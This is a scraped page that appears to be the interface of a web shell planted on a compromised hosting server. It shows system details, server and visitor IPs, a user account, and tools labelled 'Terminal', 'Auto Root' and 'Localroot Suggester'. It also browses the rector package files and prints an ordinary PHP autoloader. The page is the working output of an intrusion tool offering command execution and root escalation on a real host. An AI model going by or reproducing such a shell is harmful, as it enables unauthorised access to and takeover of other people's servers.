Linux spg20.cloudpowerdns.com 5.14.0-611.35.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 25 03:46:09 EST 2026 x86_64
LiteSpeed
Server IP : 46.4.120.162 & Your IP : 216.73.216.163
Domains :
Cant Read [ /etc/named.conf ]
User : seatingsolutions
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
cpanel /
ea-wappspector /
vendor /
rector /
rector /
Delete
Unzip
Name
Size
Permission
Date
Action
bin
[ DIR ]
drwxr-xr-x
2024-11-08 13:59
config
[ DIR ]
drwxr-xr-x
2024-11-08 13:59
rules
[ DIR ]
drwxr-xr-x
2024-11-08 13:59
src
[ DIR ]
drwxr-xr-x
2024-11-08 13:59
stubs-rector
[ DIR ]
drwxr-xr-x
2024-11-08 13:59
templates
[ DIR ]
drwxr-xr-x
2024-11-08 13:59
vendor
[ DIR ]
drwxr-xr-x
2024-11-08 13:59
LICENSE
1.1
KB
-rw-r--r--
2024-11-08 13:59
README.md
6.11
KB
-rw-r--r--
2024-11-08 13:59
bootstrap.php
800
B
-rw-r--r--
2024-11-08 13:59
composer.json
754
B
-rw-r--r--
2024-11-08 13:59
preload.php
30.31
KB
-rw-r--r--
2024-11-08 13:59
Save
Rename
<?php declare(strict_types = 1); // inspired by https://github.com/phpstan/phpstan/blob/master/bootstrap.php spl_autoload_register(function (string $class): void { static $composerAutoloader; // already loaded in bin/rector.php if (defined('__RECTOR_RUNNING__')) { return; } // load prefixed or native class, e.g. for running tests if (strpos($class, 'RectorPrefix') === 0 || strpos($class, 'Rector\\') === 0) { if ($composerAutoloader === null) { // prefixed version autoload $composerAutoloader = require __DIR__ . '/vendor/autoload.php'; } // some weird collision with PHPStan custom rule tests if (! is_int($composerAutoloader)) { $composerAutoloader->loadClass($class); } } });